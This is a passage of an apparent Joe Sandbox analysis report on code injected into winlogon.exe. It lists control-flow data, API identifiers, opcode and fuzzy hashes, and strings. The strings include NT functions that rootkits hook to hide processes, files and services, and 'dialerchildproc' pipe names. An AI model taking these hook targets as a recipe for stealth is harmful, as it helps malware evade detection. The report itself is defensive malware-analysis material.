2ea8a692fa5-2ea8a692fa8 495->503 504 2ea8a692f77-2ea8a692f84 495->504 496->495 498->499 506 2ea8a692e8d-2ea8a692e9a 498->506 500 2ea8a692eea-2ea8a692eed 499->500 501 2ea8a692ebc-2ea8a692ec9 499->501 508 2ea8a692efb-2ea8a692f08 lstrlenW 500->508 509 2ea8a692eef-2ea8a692ef9 call 2ea8a691d28 500->509 501->500 507 2ea8a692ecb-2ea8a692ed8 501->507 512 2ea8a692fb5-2ea8a692fc2 lstrlenW 503->512 513 2ea8a692faa-2ea8a692fb3 call 2ea8a691d28 503->513 504->503 511 2ea8a692f86-2ea8a692f93 504->511 514 2ea8a692e9d-2ea8a692ea3 506->514 519 2ea8a692edb-2ea8a692ee1 507->519 521 2ea8a692f2b-2ea8a692f3d call 2ea8a693930 508->521 522 2ea8a692f0a-2ea8a692f14 508->522 509->508 515 2ea8a692f43-2ea8a692f48 509->515 523 2ea8a692f96-2ea8a692f9c 511->523 517 2ea8a692fe5-2ea8a692fef call 2ea8a693930 512->517 518 2ea8a692fc4-2ea8a692fce 512->518 513->512 533 2ea8a692ffa-2ea8a693005 513->533 514->515 516 2ea8a692ea9-2ea8a692eae 514->516 527 2ea8a692ff2-2ea8a692ff4 515->527 516->499 516->514 517->527 518->517 528 2ea8a692fd0-2ea8a692fe3 call 2ea8a691554 518->528 519->515 529 2ea8a692ee3-2ea8a692ee8 519->529 521->515 521->527 522->521 532 2ea8a692f16-2ea8a692f29 call 2ea8a691554 522->532 523->533 534 2ea8a692f9e-2ea8a692fa3 523->534 527->491 527->533 528->517 528->533 529->500 529->519 532->515 532->521 538 2ea8a693007-2ea8a69300b 533->538 539 2ea8a69307c-2ea8a693080 533->539 534->503 534->523 542 2ea8a693013-2ea8a69302d call 2ea8a6986a0 538->542 543 2ea8a69300d-2ea8a693011 538->543 539->491 545 2ea8a693030-2ea8a693033 542->545 543->542 543->545 547 2ea8a693035-2ea8a693053 call 2ea8a6986a0 545->547 548 2ea8a693056-2ea8a693059 545->548 547->548 548->539 551 2ea8a69305b-2ea8a693079 call 2ea8a6986a0 548->551 551->539
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                • API String ID: 2119608203-3850299575
                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction ID: 4ff606cf43ca66dd0d1dbb4909c543affbca855edf0c47331fd648eda6f2cc4b
                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction Fuzzy Hash: 7FB19E62250AD182EFE4CF35C4487A9A3A4F744B84F5890AAEE0F53798EF39ED40C741
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                • String ID:
                                                • API String ID: 3140674995-0
                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction ID: 603fa3897b978e845a85e647aea10590a24fc888b3ea771d50ca166b4455f46e
                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction Fuzzy Hash: 1E316B76244BC18AEFA0CF60E8443EE73A0F784758F44846ADA4E47B98EF38D648C710
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                • String ID:
                                                • API String ID: 1239891234-0
                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction ID: 7bd76fdf4471c7d590cbd953dba6e3f61b7255ddb524ccc559ff26acaece1cb8
                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction Fuzzy Hash: 5C318F36244FC086EFA0CF25E84439E73A4F789758F584166EA9E43BA8DF38D545CB01
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                • String ID:
                                                • API String ID: 1443284424-0
                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction ID: d0a20c7a0dd2e52de3909a8f97bb1d337f9f021abfa7e43b4267e329d18488c8
                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction Fuzzy Hash: CBE1FE32B44AC09AEB40CF64D0882DD7BB1F345788F1581A6EE5F57B9DDA38E91AC701
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
                                                • Instruction ID: 6f358f4afe48e5772dd630dd6965a65b88f9fb91963de1c2ab91f7ce5a4d9654
                                                • Opcode Fuzzy Hash: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
                                                • Instruction Fuzzy Hash: 3D51F1227407D088FBA0DB76E90839E7BA5B340BE4F188264EE9E47B99CB3CD501C701
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2635017926.000002EA8A660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A660000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a660000_winlogon.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c472934a709f1b1001af0d924fa8e09930e5dba58a63be07c7f312c63124a0d7
                                                • Instruction ID: 03605c53b65520a6a92434e7bf1d928df83f7f57f37f2d401dd882558ec5d730
                                                • Opcode Fuzzy Hash: c472934a709f1b1001af0d924fa8e09930e5dba58a63be07c7f312c63124a0d7
                                                • Instruction Fuzzy Hash: C8F062B17642948AEFE8CF28E84672977E1F308384F808569D69EC3B18E33C90609F05

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                • String ID: d
                                                • API String ID: 2005889112-2564639436
                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction ID: aa545f155cb9358a8ffc49b630f2ad5ef1103a6709a8d2901a6cedeb3d5f76da
                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction Fuzzy Hash: 1C519A76244B8593EB90CF62E54839AB3A1F788F80F448135DA8E47B58DF3CE456CB01

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                • API String ID: 4175298099-1975688563
                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction ID: 032f23cc106d15bfc10b7335e8608da800b8efca52cbe3625d6d917c6cf048fe
                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction Fuzzy Hash: 0731E7646D19CAA0FFC4DF64E8596D86321B754384F8894B3961F0216DAF3CB25DE342

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                • API String ID: 2171963597-1373409510
                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction ID: d7bf79745f2eb27701b83dacf0c02f642d617f0e0bc21ec14e74c897d5c09cf2
                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction Fuzzy Hash: 3E21413575478183FB90CB25F54835AB3A0F389BA4F544265DA6E02BACDF3CE149CB01
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                • String ID: d
                                                • API String ID: 3743429067-2564639436
                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction ID: e78d5995f936f721d832b5ba15ffd8a056ce478808306a2282fb18531c3e8655
                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction Fuzzy Hash: FF417F33254BC097EBA4CF62E44879AB7A1F388B94F148125DB8A07B58DF38E565CB00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2635017926.000002EA8A660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A660000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a660000_winlogon.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: 929abeb9e41ac65d2fc05d7e14602cc274b4c0ccdd1d752f5dd7d29bc6d44ba2
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: 158124B56906C186FFE8EF26F84835963D1EB85780F4481B5AA0F4379EDB39E8458703
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2638717540.000002EA8A6E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002EA8A6E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a6e0000_winlogon.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: 9e52156f4434568156d2b1ffd70f63e5ad1274ab3848845171c0cca0e75123d1
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: 9C81F1656802C186FFD0FB29E84D39962D1EB45B80F3444B5BA0F4779EDB38F8668702
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: a02beb65d884c247f076919a903f28efd0885f6e9964ca6d73142cab55395d46
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: 6F818021B846C186FED4DB65D84D3A96290AB857A0F1CC4F59A0F8779EDA3CF8439703
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                • String ID: api-ms-
                                                • API String ID: 2559590344-2084034818
                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction ID: c8172244d7be525140fda3bea0f6854a91c95e6875ea09be03cef69671462014
                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction Fuzzy Hash: 65317236352AD1D1EE91DB12E8087996294FB48BA0F5D85799D2F4A3A8DF3CE4458302
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                • String ID: CONOUT$
                                                • API String ID: 3230265001-3130406586
                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction ID: 8e0cd27402a04a559e4baf4f4197540bbc2342e73089af43648c33c1861ff0fe
                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction Fuzzy Hash: 8B118C22354B8086EB90CB56E848319B2A0F788FE4F144274EA6F877A8DF78E9449745
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID: dialer
                                                • API String ID: 756756679-3528709123
                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction ID: a416b012e27badd84e8c7378111370d87a9436c7268b58d8cbcb215037abf592
                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction Fuzzy Hash: 4A31A625741B9692EF95DF66E94826973A0FB44B84F0880749E4E07B68EF3CE8A5C701
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                • String ID:
                                                • API String ID: 517849248-0
                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction ID: bf6d92317d2f7dd463c1ea37d1fe5c62319c7223f9f9b417d5a599194312f91a
                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction Fuzzy Hash: 6C018C25340A8296EF90DB12E85C39A63A1F788FC0F588075CE9F43758DE3DE989C701
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                • String ID:
                                                • API String ID: 449555515-0
                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction ID: 3abf38151c154e8aef218ac895b1326f019ccc0d83d3465d5709b47cef8f8e4c
                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction Fuzzy Hash: 65111B6975178286EFA4DB21E41D71AA6A0BB49B85F0444B8C95F47758EF3CE408D702
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                • Instruction ID: 0ca824b3be79e49c2352c9f3615b16e66517e81ee8c51bffa4bb02005598cf1c
                                                • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                • Instruction Fuzzy Hash: B8517A33262A80CAEF94CB25E44CB5937A5F344B98F58C1B09A5F477ACDB39E841C702
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: FinalHandleNamePathlstrlen
                                                • String ID: \\?\
                                                • API String ID: 2719912262-4282027825
                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction ID: d10c139b87792e473a19dd594bf67781374ee4b3761ccc206e9d8f3cc7ef59fe
                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction Fuzzy Hash: A7F04F623446C292EFA0CB21F4983596761F754B88F88C071CA4F46A5CDE6CEA89CB01
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: CombinePath
                                                • String ID: \\.\pipe\
                                                • API String ID: 3422762182-91387939
                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction ID: 8d3743f9d50d8670a7c68ec81a8e45ba57bf6a8dbb36366571e292f58eec91cc
                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction Fuzzy Hash: 5AF08224344BC291EE80CB23F90C119A661EB49FD0F089171DE6F47B2CCE2CE4419301
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction ID: 7c2fdea382859e594b3b1795dd617bd906a3fe67646aa81b14d8f95b8963db95
                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction Fuzzy Hash: 32F01265351AC591EFD8CF60E88C36523A0EB58B90F486079951F45569DF2CF489D702
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 2210144848-0
                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction ID: aebce3f7f8840781b94f5ffb6a41ce1d5e128e542a5c570418172882480f04b6
                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction Fuzzy Hash: A581C22269069089FFD0DF65D8583AD27A1F744B84F4A41B6DE0F5379ADB3CB441E312
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 9102385cd68f4d9137ef911baf5828c15806a251eaacc3be75e48e98500da15d
                                                • Instruction ID: 9283d5c99567a10095c086f3edb267925e237d5e2e07b45a7743339773e2eb7e
                                                • Opcode Fuzzy Hash: 9102385cd68f4d9137ef911baf5828c15806a251eaacc3be75e48e98500da15d
                                                • Instruction Fuzzy Hash: C561DA36559BC0CAEBA0DB15E44831AB7A0F388754F145165EB8E47BACCB7CE544CF02
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2635017926.000002EA8A660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A660000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a660000_winlogon.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: c4dbf1ef9b738c117e9bcd1c2fe79b5b41b77d0f96006122993a591555388720
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: 4D11A322AF4A8001FEE49175E85E3691143AB54374F5807B7AA7F06BFE8F18AD824102
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2638717540.000002EA8A6E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002EA8A6E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a6e0000_winlogon.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: b6978cd87ef7d327d29120f93200a48109407cdf9d8858e658eafa2b24560136
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: C711A523AD4EC101FEE49169E55E3A91041BB643F4F484EB5AF7F46BDE8A19AC424203
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 443fd3195c64268a462d32b78855740fa91136430c9d003a72b22592d8d8f5aa
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: 6D118222AD5AC102FFE89168E55E36950917B75774F0846F4BA7F063EE8B58BC426203
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2635017926.000002EA8A660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A660000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a660000_winlogon.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: b7b37d97d4a01511fb4f9e784d6bf8283def48ac70b9561eb00e021ffd951605
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: 6951AC326526908BEF94CF35E848B193395F394B98F5581B4DA4F8778CEB74E8818706
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2638717540.000002EA8A6E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002EA8A6E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a6e0000_winlogon.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: 5420a317d32a2987ba770dc99d934f514778891e0312707ba824731d2fc10ef6
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: 0951BE326526908BEF94EF25E448B183395F350B98FA181B4EA1F4378CEB35E851C706
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2635017926.000002EA8A660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A660000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a660000_winlogon.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: 528d34e4007dcb88334e2e1cd35f67450e1754ac72acfa919a06a48433f35598
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: 5B31BF722516C08BEF94DF36E84871937A5F784B88F058164AE5F0778CEB38E940CB06
                                                APIs
                                                Strings
